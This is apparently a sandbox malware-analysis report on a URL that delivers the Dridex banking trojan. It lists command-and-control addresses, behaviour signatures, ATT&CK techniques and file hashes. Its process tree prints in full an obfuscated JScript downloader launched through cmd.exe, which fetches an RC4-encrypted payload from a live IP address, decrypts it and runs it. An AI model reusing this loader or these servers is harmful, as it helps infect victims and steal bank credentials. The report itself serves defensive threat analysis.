Overview

overview

10

Static

static

URLScan

urlscan

https://ankltraffice...

windows7_x64

6

https://ankltraffice...

windows7_x64

1

https://ankltraffice...

windows7_x64

1

https://ankltraffice...

windows7_x64

1

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

Analysis

  • max time kernel
    135s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    10-09-2021 00:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://ankltrafficexit.xyz/trafficexit

  • Sample

    210910-a7538ahad4

Score
10/10
dridex10111botnetdiscoveryevasiontrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

104.152.111.198:9676

92.247.29.75:10172

133.242.136.130:8194
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 42 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3808
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3808 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NDc2NTc3&FwZgo&dsfdffg43t=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7LPRAOzrlyCelTVo_AsJONUPQDn2UaIfgdpydxdAFsR8_2piUDQzUKU05bT9UaIUQlG-aLIVLA46A&cxssdvxcv=110mpinny.93an92.406p2g8u8&sdfsdfdfg=twix&ogfgafgn4=w3_QMvXcJx7QFYPJKfrcT&fhfghddfsdf=diet&qWOMaFdXKMjE0Mjg=" "2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NDc2NTc3&FwZgo&dsfdffg43t=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7LPRAOzrlyCelTVo_AsJONUPQDn2UaIfgdpydxdAFsR8_2piUDQzUKU05bT9UaIUQlG-aLIVLA46A&cxssdvxcv=110mpinny.93an92.406p2g8u8&sdfsdfdfg=twix&ogfgafgn4=w3_QMvXcJx7QFYPJKfrcT&fhfghddfsdf=diet&qWOMaFdXKMjE0Mjg=" "2"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3092
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c mgbzb.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2728
            • C:\Users\Admin\AppData\Local\Temp\mgbzb.exe
              mgbzb.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4080

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\AX9VL96L.cookie
    MD5

    1f403453c8c06f592ef85359cf8ea515

    SHA1

    149510271bb735493648f48063b1f4b41e82c6b0

    SHA256

    f5d9f42581ec5d3e2ebe4b11d7e378df3531b24c6a7391bcbdf3504ecc882ba3

    SHA512

    cc26499c5c36f793967d4f9bca2253e638a5c384f28cbfcd5b3881a8a8007c8971452c6159f890aa33191b8d8ca217cc75dca892029ad92985308c23dc9a51d1

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\KH5DLZTJ.cookie
    MD5

    67fb146c5b5deec4419b893b40508d85

    SHA1

    5915e27de1f97f5e77339ce61ddd401e5a847840

    SHA256

    323e48286be512fd8b4d492e2012170a7904488469610de19d1ecdbbd9ea09e6

    SHA512

    5712417ffc5f0de6474480d488b665196a3e098f09f661a36360b736a934ecc106c1f4fb73ff21b40b882a9a7536d99c9c0db8adcbca9de54b58299af6238536

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\mgbzb.exe
    MD5

    223dc24b1075564c200030321e21ee09

    SHA1

    76fdfb19ae4f9de19f5c039c16fd519a5f96027f

    SHA256

    9ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280

    SHA512

    29f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\mgbzb.exe
    MD5

    223dc24b1075564c200030321e21ee09

    SHA1

    76fdfb19ae4f9de19f5c039c16fd519a5f96027f

    SHA256

    9ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280

    SHA512

    29f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277

    Download Submit
  • memory/1384-116-0x0000000000000000-mapping.dmp
    Download
  • memory/2728-120-0x0000000000000000-mapping.dmp
    Download
  • memory/2996-117-0x0000000000000000-mapping.dmp
    Download
  • memory/3092-118-0x0000000000000000-mapping.dmp
    Download
  • memory/3808-115-0x00007FFCAE9E0000-0x00007FFCAEA4B000-memory.dmp
    Filesize

    428KB

    Download
  • memory/4080-121-0x0000000000000000-mapping.dmp
    Download
  • memory/4080-125-0x0000000000400000-0x000000000051A000-memory.dmp
    Filesize

    1.1MB

    Download
  • memory/4080-124-0x00000000005B0000-0x00000000006FA000-memory.dmp
    Filesize

    1.3MB

    Download